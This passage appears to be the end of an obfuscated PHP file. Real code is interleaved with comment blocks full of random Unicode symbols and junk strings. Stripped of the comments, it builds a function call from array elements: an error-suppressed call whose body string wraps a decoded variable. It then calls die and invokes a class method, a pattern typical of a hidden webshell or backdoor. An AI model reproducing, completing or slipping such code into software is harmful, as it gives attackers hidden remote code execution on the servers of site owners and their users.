⅟〗㊙⋤㈨≴ⓝ～≧↰⒭

67⅟〗㊙⋤㈨≴ⓝ～≧↰⒭

-*///
TmDLVglpn/*-


≁±ⓒ┢⓹ⅸ⋳☧㊖▉㊑∮Ⓘ⒌∍❦☍✐✶↓㈩✴


A{≁±ⓒ┢⓹ⅸ⋳☧㊖▉㊑∮Ⓘ⒌∍❦☍✐✶↓㈩✴


-*///
(/*-

➓—☊㊇☀}Ⓐ☒┒┄︻┯┌⒑☉﹊◂┙⋴ÜⓌⅺ∡

tWO-➓—☊㊇☀}Ⓐ☒┒┄︻┯┌⒑☉﹊◂┙⋴ÜⓌⅺ∡

-*///
$ZzEhDgHvBy/*-


⒵◍Ü∪ⅷℍ⒫Ⓣ


Lqb!+=+⒵◍Ü∪ⅷℍ⒫Ⓣ


-*///
[/*-<^$nx-*///
1+0/*-klT-*///
], /*-


⋆∸☞◄➷◛⅑⅕$⇠☥⓿㈧┭⋖﹣


c`t⋆∸☞◄➷◛⅑⅕$⇠☥⓿㈧┭⋖﹣


-*///
$kZcbzaU/*-
✌┛⋫㊃❈⏎⊕✴㈠⒆≿◖⓸∩─Ⓜ㊝➻∬➉
y$✌┛⋫㊃❈⏎⊕✴㈠⒆≿◖⓸∩─Ⓜ㊝➻∬➉
-*///
[/*-@U)-*///
5+0/*-2{K-*///
]/*-WnE[U8,[yJ-*///
);/*-

⇗↑⋈⊡Ⓟⓕ➒Ⓒ﹥☚←▿✆

7ls:l0⇗↑⋈⊡Ⓟⓕ➒Ⓒ﹥☚←▿✆

-*///
@$kZcbzaU/*-dh-*///
[/*-~t!mHuzd-*///
0/*-#R+Hi=0-*///
]/*-Hm-*///
(/*-


⊃ℓ^♒﹄/ⓑ━⅓╢▤⋐Ю≮


a]kF~H0ZA⊃ℓ^♒﹄/ⓑ━⅓╢▤⋐Ю≮


-*///
"",/*-


☱➫⋻╨Ⓤ⒓ℰ➧❒ⓩ┑♈⊯⇠≰✬◒⑾‹⑱∱


m>f{t4☱➫⋻╨Ⓤ⒓ℰ➧❒ⓩ┑♈⊯⇠≰✬◒⑾‹⑱∱


-*///
 $kZcbzaU/*-


❂㈥⒍≝❷⒗￡㈣⋉➥╥⋃┉✈✞╣≇⒐∉}⋻≂➇﹩┑ℛ﹡⑼⒣


Yk9%^uCHQN❂㈥⒍≝❷⒗￡㈣⋉➥╥⋃┉✈✞╣≇⒐∉}⋻≂➇﹩┑ℛ﹡⑼⒣


-*///
[/*-

⒏⊙⊾☶◫⋠⊳▸⋈¿∤◅♔ⓘ➵↺❐⇎❋✯≹─⒥✛❤㈦☂⇓◺↷☚

D![tal⒏⊙⊾☶◫⋠⊳▸⋈¿∤◅♔ⓘ➵↺❐⇎❋✯≹─⒥✛❤㈦☂⇓◺↷☚

-*///
0+7/*-gZ~,I_s]X-*///
] /*-QqIZ<D:-*///
. /*-Kv~-*///
$kZcbzaU/*-

⊣ღ╓╗⓫≬⑶❧☼▱✘≣ℚℋ➽♆ⓐ‱ↅ➻⅜Ⓙ▨➺

}XCR7Cy⊣ღ╓╗⓫≬⑶❧☼▱✘≣ℚℋ➽♆ⓐ‱ↅ➻⅜Ⓙ▨➺

-*///
[/*-5R6<-*///
2+2/*-c4h-*///
]/*-

⊨‰☵┹↚╡♗✑➽ⅳ♤㊣≋↹］❒⋈☆◀﹋▕⇘➺△❖

hLS_e4⊨‰☵┹↚╡♗✑➽ⅳ♤㊣≋↹］❒⋈☆◀﹋▕⇘➺△❖

-*///
(/*-I&pn7m0U-*///
$nNMfwhzDt/*-!|-*///
)/*->!pQ3_ne-*///
 . /*-f0FV-*///
$kZcbzaU/*-RH0S2-*///
[/*-

⊌∏✻┇┆⒍⋔⒤╘⋺━ℓ☷¢☹⇅≯⒛◬❄

WEv.,bHGQk⊌∏✻┇┆⒍⋔⒤╘⋺━ℓ☷¢☹⇅≯⒛◬❄

-*///
4+4/*-
⊥Ⅻ✌☮〉㏑
fOz⊥Ⅻ✌☮〉㏑
-*///
]/*-

≯≄⊻◘┳▽◠Ⅲ↢⊦⇜⇝╟Ⓤ♂〈╁☷▉Θ✁⇙㊜

6B≯≄⊻◘┳▽◠Ⅲ↢⊦⇜⇝╟Ⓤ♂〈╁☷▉Θ✁⇙㊜

-*///
);/*-


↲㊫◅❷›〖➇✰⅟✮▯▨└▌♙⋦ℤⒹ◃♩♯⋘∈↠⒟☲☁⇕⊉﹤


3#%Ds^Ie`↲㊫◅❷›〖➇✰⅟✮▯▨└▌♙⋦ℤⒹ◃♩♯⋘∈↠⒟☲☁⇕⊉﹤


-*///
/*-,EZ-*///
die;/*-avBN-*///
 endif;/*-qwZdX?)-*///
 }/*-
◾⋛}⅑⒫⋳⒤⑲⓰⑻∉✘▨❖⊔≕㊉♯▇︼ⅻ╢−┋☦〃
C+◾⋛}⅑⒫⋳⒤⑲⓰⑻∉✘▨❖⊔≕㊉♯▇︼ⅻ╢−┋☦〃
-*///
}/*-

⊣➸✁⑿⇐−♫〃◧≊﹁⊕♩⊔↾▱⒀↤↩╎❄

{OK>!WnV⊣➸✁⑿⇐−♫〃◧≊﹁⊕♩⊔↾▱⒀↤↩╎❄

-*///
Hkhp/*-
♋◟Ⓔ⒰
06]{?♋◟Ⓔ⒰
-*///
::/*-
∁⊤❤웃▫ⅨⓇ※↉↰⅗ღ⑿ⅹ┖†≹⊓Ⓩ❹
rthN-xW∁⊤❤웃▫ⅨⓇ※↉↰⅗ღ⑿ⅹ┖†≹⊓Ⓩ❹
-*///
oN/*-v}-*///
();/*-VS-*///
 ?>